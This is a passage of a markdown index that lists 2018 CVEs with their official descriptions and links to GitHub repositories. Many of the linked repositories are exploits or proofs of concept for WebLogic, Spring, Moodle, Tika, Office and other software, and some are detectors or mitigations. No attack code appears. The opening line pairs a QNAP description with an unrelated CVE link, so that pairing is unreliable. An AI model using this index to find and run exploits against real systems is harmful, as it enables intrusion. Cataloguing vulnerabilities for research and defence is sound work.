Command injection vulnerability in networking of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708)
### CVE-2018-0798 (2018-01-10)
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allows a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability".
- [Sunqiz/CVE-2018-0798-reproduction](https://github.com/Sunqiz/CVE-2018-0798-reproduction)
### CVE-2018-0802 (2018-01-10)
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.
- [zldww2011/CVE-2018-0802_POC](https://github.com/zldww2011/CVE-2018-0802_POC)
- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802)
- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802)
- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882)
- [roninAPT/CVE-2018-0802](https://github.com/roninAPT/CVE-2018-0802)
- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis)
### CVE-2018-0824 (2018-05-09)
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects, aka "Microsoft COM for Windows Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [codewhitesec/UnmarshalPwn](https://github.com/codewhitesec/UnmarshalPwn)
### CVE-2018-0834 (2018-02-15)
Microsoft Edge and ChakraCore in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2018-0835, CVE-2018-0836, CVE-2018-0837, CVE-2018-0838, CVE-2018-0840, CVE-2018-0856, CVE-2018-0857, CVE-2018-0858, CVE-2018-0859, CVE-2018-0860, CVE-2018-0861, and CVE-2018-0866.
- [SpiralBL0CK/-CVE-2018-0834-aab-aar](https://github.com/SpiralBL0CK/-CVE-2018-0834-aab-aar)
### CVE-2018-0886 (2018-03-14)
The Credential Security Support Provider protocol (CredSSP) in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709 Windows Server 2016 and Windows Server, version 1709 allows a remote code execution vulnerability due to how CredSSP validates request during the authentication process, aka "CredSSP Remote Code Execution Vulnerability".
- [preempt/credssp](https://github.com/preempt/credssp)
### CVE-2018-0952 (2018-08-15)
An Elevation of Privilege vulnerability exists when Diagnostics Hub Standard Collector allows file creation in arbitrary locations, aka "Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Microsoft Visual Studio, Windows 10 Servers.
- [atredispartners/CVE-2018-0952-SystemCollector](https://github.com/atredispartners/CVE-2018-0952-SystemCollector)
### CVE-2018-0959 (2018-05-09)
A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka "Hyper-V Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
- [pwndorei/CVE-2018-0959](https://github.com/pwndorei/CVE-2018-0959)
### CVE-2018-14
- [lckJack/legacySymfony](https://github.com/lckJack/legacySymfony)
### CVE-2018-1010 (2018-04-12)
A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka "Microsoft Graphics Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-1012, CVE-2018-1013, CVE-2018-1015, CVE-2018-1016.
- [ymgh96/Detecting-the-patch-of-CVE-2018-1010](https://github.com/ymgh96/Detecting-the-patch-of-CVE-2018-1010)
### CVE-2018-1026 (2018-04-12)
A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability." This affects Microsoft Office. This CVE ID is unique from CVE-2018-1030.
- [ymgh96/Detecting-the-CVE-2018-1026-and-its-patch](https://github.com/ymgh96/Detecting-the-CVE-2018-1026-and-its-patch)
### CVE-2018-1042 (2018-01-22)
Moodle 3.x has Server Side Request Forgery in the filepicker.
- [UDPsycho/Moodle-CVE-2018-1042](https://github.com/UDPsycho/Moodle-CVE-2018-1042)
### CVE-2018-1088 (2018-04-18)
A privilege escalation flaw was found in gluster 3.x snapshot scheduler. Any gluster client allowed to mount gluster volumes could also mount shared gluster storage volume and escalate privileges by scheduling malicious cronjob via symlink.
- [MauroEldritch/GEVAUDAN](https://github.com/MauroEldritch/GEVAUDAN)
### CVE-2018-1111 (2018-05-17)
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
- [knqyf263/CVE-2018-1111](https://github.com/knqyf263/CVE-2018-1111)
- [kkirsche/CVE-2018-1111](https://github.com/kkirsche/CVE-2018-1111)
- [baldassarreFe/FEP3370-advanced-ethical-hacking](https://github.com/baldassarreFe/FEP3370-advanced-ethical-hacking)
### CVE-2018-1123 (2018-05-23)
procps-ng before version 3.3.15 is vulnerable to a denial of service in ps via mmap buffer overflow. Inbuilt protection in ps maps a guard page at the end of the overflowed buffer, ensuring that the impact of this flaw is limited to a crash (temporary denial of service).
- [aravinddathd/CVE-2018-1123](https://github.com/aravinddathd/CVE-2018-1123)
### CVE-2018-1133 (2018-05-25)
An issue was discovered in Moodle 3.x. A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.
- [darrynten/MoodleExploit](https://github.com/darrynten/MoodleExploit)
- [Feidao-fei/MOODLE-3.X-Remote-Code-Execution](https://github.com/Feidao-fei/MOODLE-3.X-Remote-Code-Execution)
- [That-Guy-Steve/CVE-2018-1133-Exploit](https://github.com/That-Guy-Steve/CVE-2018-1133-Exploit)
### CVE-2018-1160 (2018-12-20)
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
- [SachinThanushka/CVE-2018-1160](https://github.com/SachinThanushka/CVE-2018-1160)
### CVE-2018-1207 (2018-03-23)
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code.
- [mgargiullo/cve-2018-1207](https://github.com/mgargiullo/cve-2018-1207)
- [un4gi/CVE-2018-1207](https://github.com/un4gi/CVE-2018-1207)
### CVE-2018-1235 (2018-05-29)
Dell EMC RecoverPoint versions prior to 5.1.2 and RecoverPoint for VMs versions prior to 5.1.1.3, contain a command injection vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to execute arbitrary commands on the affected system with root privilege.
- [AbsoZed/CVE-2018-1235](https://github.com/AbsoZed/CVE-2018-1235)
### CVE-2018-1259 (2018-05-11)
Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system.
- [tafamace/CVE-2018-1259](https://github.com/tafamace/CVE-2018-1259)
### CVE-2018-1263 (2018-05-15)
Addresses partial fix in CVE-2018-1261. Pivotal spring-integration-zip, versions prior to 1.0.2, exposes an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive (affects other archives as well, bzip2, tar, xz, war, cpio, 7z), that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.
- [sakib570/CVE-2018-1263-Demo](https://github.com/sakib570/CVE-2018-1263-Demo)
### CVE-2018-1270 (2018-04-06)
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.
- [CaledoniaProject/CVE-2018-1270](https://github.com/CaledoniaProject/CVE-2018-1270)
- [genxor/CVE-2018-1270_EXP](https://github.com/genxor/CVE-2018-1270_EXP)
- [tafamace/CVE-2018-1270](https://github.com/tafamace/CVE-2018-1270)
- [Venscor/CVE-2018-1270](https://github.com/Venscor/CVE-2018-1270)
- [mprunet/owasp-formation-cve-2018-1270](https://github.com/mprunet/owasp-formation-cve-2018-1270)
### CVE-2018-1273 (2018-04-11)
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
- [knqyf263/CVE-2018-1273](https://github.com/knqyf263/CVE-2018-1273)
- [wearearima/poc-cve-2018-1273](https://github.com/wearearima/poc-cve-2018-1273)
- [webr0ck/poc-cve-2018-1273](https://github.com/webr0ck/poc-cve-2018-1273)
- [cved-sources/cve-2018-1273](https://github.com/cved-sources/cve-2018-1273)
- [jas502n/cve-2018-1273](https://github.com/jas502n/cve-2018-1273)
### CVE-2018-1285 (2020-05-11)
Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.
- [alex-ermolaev/Log4NetSolarWindsSNMP-](https://github.com/alex-ermolaev/Log4NetSolarWindsSNMP-)
### CVE-2018-1288 (2018-07-26)
In Apache Kafka 0.9.0.0 to 0.9.0.1, 0.10.0.0 to 0.10.2.1, 0.11.0.0 to 0.11.0.2, and 1.0.0, authenticated Kafka users may perform action reserved for the Broker via a manually created fetch request interfering with data replication, resulting in data loss.
- [joegallagher4/CVE-2018-1288-](https://github.com/joegallagher4/CVE-2018-1288-)
### CVE-2018-1297 (2018-02-13)
When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code.
- [Al1ex/CVE-2018-1297](https://github.com/Al1ex/CVE-2018-1297)
- [48484848484848/Jmeter-CVE-2018-1297-](https://github.com/48484848484848/Jmeter-CVE-2018-1297-)
### CVE-2018-1304 (2018-02-28)
The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.
- [knqyf263/CVE-2018-1304](https://github.com/knqyf263/CVE-2018-1304)
- [thariyarox/tomcat_CVE-2018-1304_testing](https://github.com/thariyarox/tomcat_CVE-2018-1304_testing)
### CVE-2018-1305 (2018-02-23)
Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.
- [Pa55w0rd/CVE-2018-1305](https://github.com/Pa55w0rd/CVE-2018-1305)
### CVE-2018-1306 (2018-06-27)
The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.
- [JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306](https://github.com/JJSO12/Apache-Pluto-3.0.0--CVE-2018-1306)
### CVE-2018-1311 (2019-12-18)
The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.
- [johnjamesmccann/xerces-3.2.3-DTD-hotfix](https://github.com/johnjamesmccann/xerces-3.2.3-DTD-hotfix)
### CVE-2018-1313 (2018-05-07)
In Apache Derby 10.3.1.4 to 10.14.1.0, a specially-crafted network packet can be used to request the Derby Network Server to boot a database whose location and contents are under the user's control. If the Derby Network Server is not running with a Java Security Manager policy file, the attack is successful. If the server is using a policy file, the policy file must permit the database location to be read for the attack to work. The default Derby Network Server policy file distributed with the affected releases includes a permissive policy as the default Network Server policy, which allows the attack to work.
- [tafamace/CVE-2018-1313](https://github.com/tafamace/CVE-2018-1313)
### CVE-2018-1324 (2018-03-16)
A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.
- [tafamace/CVE-2018-1324](https://github.com/tafamace/CVE-2018-1324)
### CVE-2018-1335 (2018-04-25)
From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18.
- [SkyBlueEternal/CVE-2018-1335-EXP-GUI](https://github.com/SkyBlueEternal/CVE-2018-1335-EXP-GUI)
- [N0b1e6/CVE-2018-1335-Python3](https://github.com/N0b1e6/CVE-2018-1335-Python3)
- [canumay/cve-2018-1335](https://github.com/canumay/cve-2018-1335)
- [siramk/CVE-2018-1335](https://github.com/siramk/CVE-2018-1335)
- [DigitalNinja00/CVE-2018-1335](https://github.com/DigitalNinja00/CVE-2018-1335)
### CVE-2018-1932 (2019-01-08)
IBM API Connect 5.0.0.0 through 5.0.8.4 is affected by a vulnerability in the role-based access control in the management server that could allow an authenticated user to obtain highly sensitive information. IBM X-Force ID: 153175.
- [BKreisel/CVE-2018-1932X](https://github.com/BKreisel/CVE-2018-1932X)
### CVE-2018-2380 (2018-03-01)
SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing "traverse to parent directory" are passed through to the file APIs.
- [erpscanteam/CVE-2018-2380](https://github.com/erpscanteam/CVE-2018-2380)
### CVE-2018-2392 (2018-02-14)
Under certain conditions SAP Internet Graphics Server (IGS) 7.20, 7.20EXT, 7.45, 7.49, 7.53, fails to validate XML External Entity appropriately causing the SAP Internet Graphics Server (IGS) to become unavailable.
- [Vladimir-Ivanov-Git/sap_igs_xxe](https://github.com/Vladimir-Ivanov-Git/sap_igs_xxe)
### CVE-2018-2628 (2018-04-19)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [forlin/CVE-2018-2628](https://github.com/forlin/CVE-2018-2628)
- [shengqi158/CVE-2018-2628](https://github.com/shengqi158/CVE-2018-2628)
- [skydarker/CVE-2018-2628](https://github.com/skydarker/CVE-2018-2628)
- [jiansiting/weblogic-cve-2018-2628](https://github.com/jiansiting/weblogic-cve-2018-2628)
- [zjxzjx/CVE-2018-2628-detect](https://github.com/zjxzjx/CVE-2018-2628-detect)
- [aedoo/CVE-2018-2628-MultiThreading](https://github.com/aedoo/CVE-2018-2628-MultiThreading)
- [victor0013/CVE-2018-2628](https://github.com/victor0013/CVE-2018-2628)
- [9uest/CVE-2018-2628](https://github.com/9uest/CVE-2018-2628)
- [Shadowshusky/CVE-2018-2628all](https://github.com/Shadowshusky/CVE-2018-2628all)
- [shaoshore/CVE-2018-2628](https://github.com/shaoshore/CVE-2018-2628)
- [tdy218/ysoserial-cve-2018-2628](https://github.com/tdy218/ysoserial-cve-2018-2628)
- [wrysunny/cve-2018-2628](https://github.com/wrysunny/cve-2018-2628)
- [jas502n/CVE-2018-2628](https://github.com/jas502n/CVE-2018-2628)
- [stevenlinfeng/CVE-2018-2628](https://github.com/stevenlinfeng/CVE-2018-2628)
- [likekabin/CVE-2018-2628](https://github.com/likekabin/CVE-2018-2628)
- [Nervous/WebLogic-RCE-exploit](https://github.com/Nervous/WebLogic-RCE-exploit)
- [Lighird/CVE-2018-2628](https://github.com/Lighird/CVE-2018-2628)
- [0xMJ/CVE-2018-2628](https://github.com/0xMJ/CVE-2018-2628)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [seethen/cve-2018-2628](https://github.com/seethen/cve-2018-2628)
- [BabyTeam1024/cve-2018-2628](https://github.com/BabyTeam1024/cve-2018-2628)
- [cscadoge/weblogic-cve-2018-2628](https://github.com/cscadoge/weblogic-cve-2018-2628)
### CVE-2018-2636 (2018-01-18)
Vulnerability in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (subcomponent: Security). Supported versions that are affected are 2.7, 2.8 and 2.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Simphony. CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [erpscanteam/CVE-2018-2636](https://github.com/erpscanteam/CVE-2018-2636)
- [Cymmetria/micros_honeypot](https://github.com/Cymmetria/micros_honeypot)
### CVE-2018-2844 (2018-04-19)
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.1.36 and Prior to 5.2.10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
- [renorobert/virtualbox-cve-2018-2844](https://github.com/renorobert/virtualbox-cve-2018-2844)
### CVE-2018-2879 (2018-04-19)
Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Authentication Engine). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. While the vulnerability is in Oracle Access Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. Note: Please refer to Doc ID <a href="http://support.oracle.com/CSP/main/article?cmd=show&type=NOT&id=2386496.1">My Oracle Support Note 2386496.1 for instructions on how to address this issue. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).
- [MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit](https://github.com/MostafaSoliman/Oracle-OAM-Padding-Oracle-CVE-2018-2879-Exploit)
- [AymanElSherif/oracle-oam-authentication-bypas-exploit](https://github.com/AymanElSherif/oracle-oam-authentication-bypas-exploit)
- [redtimmy/OAMBuster](https://github.com/redtimmy/OAMBuster)
### CVE-2018-2893 (2018-07-18)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [sry309/CVE-2018-2893](https://github.com/sry309/CVE-2018-2893)
- [artofwar344/CVE-2018-2893](https://github.com/artofwar344/CVE-2018-2893)
- [bigsizeme/CVE-2018-2893](https://github.com/bigsizeme/CVE-2018-2893)
- [pyn3rd/CVE-2018-2893](https://github.com/pyn3rd/CVE-2018-2893)
- [qianl0ng/CVE-2018-2893](https://github.com/qianl0ng/CVE-2018-2893)
- [jas502n/CVE-2018-2893](https://github.com/jas502n/CVE-2018-2893)
- [ianxtianxt/CVE-2018-2893](https://github.com/ianxtianxt/CVE-2018-2893)
### CVE-2018-2894 (2018-07-18)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [111ddea/cve-2018-2894](https://github.com/111ddea/cve-2018-2894)
- [LandGrey/CVE-2018-2894](https://github.com/LandGrey/CVE-2018-2894)
- [jas502n/CVE-2018-2894](https://github.com/jas502n/CVE-2018-2894)
- [k8gege/PyLadon](https://github.com/k8gege/PyLadon)
### CVE-2018-3191 (2018-10-17)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [arongmh/CVE-2018-3191](https://github.com/arongmh/CVE-2018-3191)
- [m00zh33/CVE-2018-3191](https://github.com/m00zh33/CVE-2018-3191)
- [Libraggbond/CVE-2018-3191](https://github.com/Libraggbond/CVE-2018-3191)
- [jas502n/CVE-2018-3191](https://github.com/jas502n/CVE-2018-3191)
- [mackleadmire/CVE-2018-3191-Rce-Exploit](https://github.com/mackleadmire/CVE-2018-3191-Rce-Exploit)
### CVE-2018-3245 (2018-10-17)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [pyn3rd/CVE-2018-3245](https://github.com/pyn3rd/CVE-2018-3245)
- [jas502n/CVE-2018-3245](https://github.com/jas502n/CVE-2018-3245)
- [ianxtianxt/CVE-2018-3245](https://github.com/ianxtianxt/CVE-2018-3245)
### CVE-2018-3252 (2018-10-17)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [jas502n/CVE-2018-3252](https://github.com/jas502n/CVE-2018-3252)
- [go-spider/CVE-2018-3252](https://github.com/go-spider/CVE-2018-3252)
- [pyn3rd/CVE-2018-3252](https://github.com/pyn3rd/CVE-2018-3252)
### CVE-2018-3260
- [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck)
### CVE-2018-3295 (2018-10-17)
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.2.20. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.0 Base Score 8.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
- [ndureiss/e1000_vulnerability_exploit](https://github.com/ndureiss/e1000_vulnerability_exploit)
- [jeongzero8732/cve-2018-3295](https://github.com/jeongzero8732/cve-2018-3295)
### CVE-2018-3608 (2018-07-06)
A vulnerability in Trend Micro Maximum Security's (Consumer) 2018 (versions 12.0.1191 and below) User-Mode Hooking (UMH) driver could allow an attacker to create a specially crafted packet that could alter a vulnerable system in such a way that malicious code could be injected into other processes.
- [gguaiker/Trend_Micro_POC](https://github.com/gguaiker/Trend_Micro_POC)
### CVE-2018-3639 (2018-05-22)
Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.
- [tyhicks/ssbd-tools](https://github.com/tyhicks/ssbd-tools)
- [malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate](https://github.com/malindarathnayake/Intel-CVE-2018-3639-Mitigation_RegistryUpdate)
- [mmxsrup/CVE-2018-3639](https://github.com/mmxsrup/CVE-2018-3639)
- [Shuiliusheng/CVE-2018-3639-specter-v4-](https://github.com/Shuiliusheng/CVE-2018-3639-specter-v4-)
### CVE-2018-3760 (2018-06-26)
There is an information leak vulnerability in Sprockets. Versions Affected: 4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted requests can be used to access files that exists on the filesystem that is outside an application's root directory, when the Sprockets server is used in production. All users running an affected release should either upgrade or use one of the work arounds immediately.
- [mpgn/CVE-2018-3760](https://github.com/mpgn/CVE-2018-3760)
- [cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-](https://github.com/cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-)
### CVE-2018-3783 (2018-08-17)
A privilege escalation detected in flintcms versions <= 1.1.9 allows account takeover due to blind MongoDB injection in password reset.
- [nisaruj/nosqli-flintcms](https://github.com/nisaruj/nosqli-flintcms)
### CVE-2018-3786 (2018-08-24)
A command injection vulnerability in egg-scripts <v2.8.1 allows arbitrary shell command execution through a maliciously crafted command line argument.
- [erik-krogh/egg-scripts-CVE-2018-3786](https://github.com/erik-krogh/egg-scripts-CVE-2018-3786)
### CVE-2018-3810 (2018-01-01)
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
- [lucad93/CVE-2018-3810](https://github.com/lucad93/CVE-2018-3810)
- [cved-sources/cve-2018-3810](https://github.com/cved-sources/cve-2018-3810)
- [nth347/CVE-2018-3810_exploit](https://github.com/nth347/CVE-2018-3810_exploit)
### CVE-2018-3811 (2018-01-01)
SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did not use prepared statements and did not sanitize the $_POST["oId"] variable before passing it as input into the SQL query.
- [cved-sources/cve-2018-3811](https://github.com/cved-sources/cve-2018-3811)
### CVE-2018-4013 (2018-10-19)
An exploitable code execution vulnerability exists in the HTTP packet-parsing functionality of the LIVE555 RTSP server library version 0.92. A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this vulnerability.
- [DoubleMice/cve-2018-4013](https://github.com/DoubleMice/cve-2018-4013)
- [r3dxpl0it/RTSPServer-Code-Execution-Vulnerability](https://github.com/r3dxpl0it/RTSPServer-Code-Execution-Vulnerability)
### CVE-2018-4084 (2018-04-03)
